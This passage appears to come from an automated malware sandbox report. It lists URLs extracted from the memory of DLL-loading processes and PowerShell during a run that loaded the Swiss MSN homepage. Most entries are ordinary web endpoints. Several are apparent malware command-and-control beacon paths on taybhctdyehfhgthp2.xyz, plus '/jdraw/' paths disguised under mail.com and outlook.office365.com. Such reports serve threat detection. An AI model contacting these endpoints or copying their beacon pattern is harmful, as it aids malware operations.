48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen|https://outlook.live.com/mail/deeplink/compose;Kalender|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)
            Source: potec.core.min[2].js.20.drString found in binary or memory: zh.prototype.f=function(){var a=this;this.url=z.R(this.a,"data-url")||window.location.href;this.Md="menubar\x3dno,toolbar\x3dno,resizable\x3dyes,scrollbars\x3dyes,height\x3d500,width\x3d500";this.a.find("[data-social]").b("click",function(b){b.preventDefault();switch(this.getAttribute("data-social")){case "facebook":window.open("https://www.facebook.com/sharer/sharer.php?u\x3d"+(0,window.encodeURIComponent)(a.url),"",a.Md);break;case "twitter":window.open("https://twitter.com/intent/tweet?text\x3d"+(0,window.encodeURIComponent)(window.document.title)+ equals www.facebook.com (Facebook)
            Source: potec.core.min[2].js.20.drString found in binary or memory: zh.prototype.f=function(){var a=this;this.url=z.R(this.a,"data-url")||window.location.href;this.Md="menubar\x3dno,toolbar\x3dno,resizable\x3dyes,scrollbars\x3dyes,height\x3d500,width\x3d500";this.a.find("[data-social]").b("click",function(b){b.preventDefault();switch(this.getAttribute("data-social")){case "facebook":window.open("https://www.facebook.com/sharer/sharer.php?u\x3d"+(0,window.encodeURIComponent)(a.url),"",a.Md);break;case "twitter":window.open("https://twitter.com/intent/tweet?text\x3d"+(0,window.encodeURIComponent)(window.document.title)+ equals www.twitter.com (Twitter)
            Source: unknownDNS traffic detected: queries for: www.msn.com
            Source: powershell.exe, 00000021.00000002.514361003.000001E9C3DA0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: head.min[2].js.21.drString found in binary or memory: http://modernizr.com/download/?-csstransforms-csstransforms3d-csstransitions-flexbox-flexboxlegacy-f
            Source: powershell.exe, 00000021.00000002.499970967.000001E9ABB99000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: de-ch[1].htm.6.drString found in binary or memory: http://ogp.me/ns#
            Source: de-ch[1].htm.6.drString found in binary or memory: http://ogp.me/ns/fb#
            Source: powershell.exe, 00000021.00000002.497662927.000001E9ABA9D000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: auction[1].htm.6.drString found in binary or memory: http://popup.taboola.com/german
            Source: powershell.exe, 00000021.00000002.495394325.000001E9AB881000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: picturefill.min[2].js.21.drString found in binary or memory: http://scottjehl.github.io/picturefill
            Source: ~DF745D33E3B1706BEF.TMP.4.drString found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
            Source: imagestore.dat.4.drString found in binary or memory: http://taybhctdyehfhgthp2.xyz/favicon.ico
            Source: imagestore.dat.4.dr, imagestore.dat.24.drString found in binary or memory: http://taybhctdyehfhgthp2.xyz/favicon.ico~
            Source: loaddll32.exe, 00000000.00000002.494477774.00000000028B0000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.493831362.0000000003560000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.495111751.00000000031E0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.493865166.0000000002C60000.00000002.00000001.sdmp, powershell.exe, 00000021.00000002.495164163.000001E9AA3A0000.00000002.00000001.sdmpString found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/2dmHXVLFpoxZkp/lRnXRf4rg4uMzmmWxeqRM/HUrKxMJE8mnsaP3a/BSrsC
            Source: ~DF41C6F94D5CD15673.TMP.4.dr, {855EF56B-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/2dmHXVLFpoxZkp/lRnXRf4rg4uMzmmWxeqRM/HUrKxMJE8mnsaP3a/BSrsCvSsG_
            Source: {7E89C2B0-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/6egkLxw_2B/0MDk_2F6Dttk_2BDL/PeMCvV_2FKSI/4qVuvEJzX6I/FapijqFJTF
            Source: loaddll32.exe, 00000000.00000002.494477774.00000000028B0000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.493831362.0000000003560000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.495111751.00000000031E0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.493865166.0000000002C60000.00000002.00000001.sdmp, powershell.exe, 00000021.00000002.495164163.000001E9AA3A0000.00000002.00000001.sdmpString found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/WEqyJQ4Nq2nQ9ndVH/biMw8nJM827T/xrW3osP_2Bm/N3LwbnFmUNMeEO/_
            Source: {855EF56F-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/WEqyJQ4Nq2nQ9ndVH/biMw8nJM827T/xrW3osP_2Bm/N3LwbnFmUNMeEO/_2FGDU
            Source: {855EF565-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/WzEyJLB3xlLsnabkhWyV0S/yaPNrrtbEg_2F/gaaPNPvk/KT7taNsNnsmIKyasgT
            Source: {855EF567-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/_2F4Q_2FnvV/BpomczM_2B2Jkp/FRSRsBJeoQn3RBrurQkGr/rDwzJqou7P_2BXV
            Source: regsvr32.exe, 00000002.00000003.443079927.0000000000FA6000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.449890732.0000000000F96000.00000004.00000001.sdmp, ~DF434D42DEB8F7938B.TMP.4.dr, {7E89C2AA-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/_2Faxv8_2Bu0S355431/zWBmIqRqQnvMB_2FKOk6CG/NwnPAjKDdicU7/LyyqKz0
            Source: ~DFC0327530F4C9EDC8.TMP.4.dr, {855EF56D-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/gtqnX1_2BBrthQ/u3Ow9U77gyB4yz7FWcMqW/MB7b6_2BOONkcuHq/pp1MQOLvSN
            Source: rundll32.exe, 00000003.00000003.475793042.0000000002DD3000.00000004.00000001.sdmp, ~DF58DEFE5429921A67.TMP.4.dr, {855EF569-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/p5RR5qqGgi5cTLPxy/2iFqCZAtdge9/_2B0gp3GesH/Xr71XWjGQYQuWa/hA9AKk
            Source: {7E89C2AC-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: http://taybhctdyehfhgthp2.xyz/jdraw/tR4LnoSVINT1f2c/0VvJfJtFJ0fvpQScRR/CPWVnO7Ig/8xymBr8_2BV2MPJj4Wb
            Source: msapplication.xml.4.drString found in binary or memory: http://www.amazon.com/
            Source: powershell.exe, 00000021.00000002.497662927.000001E9ABA9D000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: msapplication.xml1.4.drString found in binary or memory: http://www.google.com/
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
            Source: msapplication.xml2.4.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml3.4.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml4.4.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml5.4.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml6.4.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml7.4.drString found in binary or memory: http://www.youtube.com/
            Source: gtm[1].js.20.drString found in binary or memory: https://adservice.google.com/pagead/regclk
            Source: de-ch[1].htm.6.drString found in binary or memory: https://amzn.to/2TTxhNg
            Source: auction[1].htm.6.drString found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&amp;ap
            Source: de-ch[1].htm.6.drString found in binary or memory: https://apps.apple.com/ch/app/microsoft-news/id945416273?pt=80423&amp;ct=prime_footer&amp;mt=8
            Source: gtm[1].js.20.dr, optimize[1].js.20.drString found in binary or memory: https://cct.google/taggy/agent.js
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
            Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_office&amp;
            Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_store&amp;m
            Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_promotionalstripe_na
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://client-s.gateway.messenger.live.com
            Source: de-ch[1].htm.6.drString found in binary or memory: https://clk.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=21863656
            Source: de-ch[1].htm.6.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24545562
            Source: de-ch[1].htm.6.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24545562&amp;epi=de-ch
            Source: de-ch[1].htm.6.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=295926&amp;a=3064090&amp;g=24886692
            Source: ~DF745D33E3B1706BEF.TMP.4.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
            Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
            Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;http
            Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=858412214&amp;size=306x271&amp;http
            Source: ~DF745D33E3B1706BEF.TMP.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
            Source: ~DF745D33E3B1706BEF.TMP.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
            Source: powershell.exe, 00000021.00000002.499970967.000001E9ABB99000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000021.00000002.499970967.000001E9ABB99000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000021.00000002.499970967.000001E9ABB99000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
            Source: consentpage[1].htm.19.drString found in binary or memory: https://dl.mail.com/permission/live/v1/ppp/js/permission-client.js
            Source: consentpage[1].htm.19.drString found in binary or memory: https://dl.mail.com/tcf/live/v1/js/tcf-api.js
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
            Source: powershell.exe, 00000021.00000002.497662927.000001E9ABA9D000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: url-polyfill[1].js.19.drString found in binary or memory: https://github.com/WebReflection/url-search-params/blob/master/src/url-search-params.js
            Source: url-polyfill[1].js.19.drString found in binary or memory: https://github.com/arv/DOM-URL-Polyfill/blob/master/src/url.js
            Source: bundle.min[1].js.19.drString found in binary or memory: https://github.com/getsentry/sentry-javascript
            Source: permission-client[1].js.19.drString found in binary or memory: https://github.com/js-cookie/js-cookie
            Source: picturefill.min[2].js.21.drString found in binary or memory: https://github.com/scottjehl/picturefill/blob/master/Authors.txt;
            Source: auction[1].htm.6.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
            Source: core[1].htm.19.drString found in binary or memory: https://img.ui-portal.de/pos-cdn/tracklib/4.3.0/polyfills.min.js
            Source: core[1].htm.19.drString found in binary or memory: https://img.ui-portal.de/pos-cdn/tracklib/4.3.0/tracklib.min.js
            Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1625574581&amp;rver=7.0.6730.0&am
            Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/logout.srf?ct=1625574582&amp;rver=7.0.6730.0&amp;lc=1033&amp;id=1184&amp;lru=
            Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1625574581&amp;rver=7.0.6730.0&amp;w
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
            Source: 6QglyA[1].htm.19.drString found in binary or memory: https://mail.com/jdraw/GTAeWl1dTEKsPGzboniA9C/3TQSND4hN4q8j/tJxnEgfP/uW5VGwHzywLraum6aAQWdJy/1RqIzWD
            Source: powershell.exe, 00000021.00000002.499970967.000001E9ABB99000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/#qt=mru
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
            Source: de-ch[1].htm.6.drString found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/about/en/download/
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com;Fotos
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com;OneDrive-App
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
            Source: de-ch[1].htm.6.drString found in binary or memory: https://outlook.com/
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://outlook.live.com/calendar
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
            Source: {61C46D29-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: https://outlook.office365.com/jdraw/AsyRg_2BVSdI/XmsSORBsoAL/M5uOi2ty5xn2OE/ER18j8gGrXEoZA_2FCM38/1O
            Source: {61C46D27-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: https://outlook.office365.com/jdraw/YV9_2BRIFh2A/q7dpbh5Wtee/h9DRSfahzOVkbw/8nj9JvAX9J0uIFu5B3_2B/oU
            Source: {7E89C2AE-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: https://outlook.office365.com/jdraw/vqfQiI7wHQRYBipo/2YRO_2BiyLl_2Fp/6B0k0PRCnXIV6OmEu7/x1gwiJ0go/pe
            Source: ~DF5F04A478F43FE59C.TMP.4.dr, {61C46D25-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: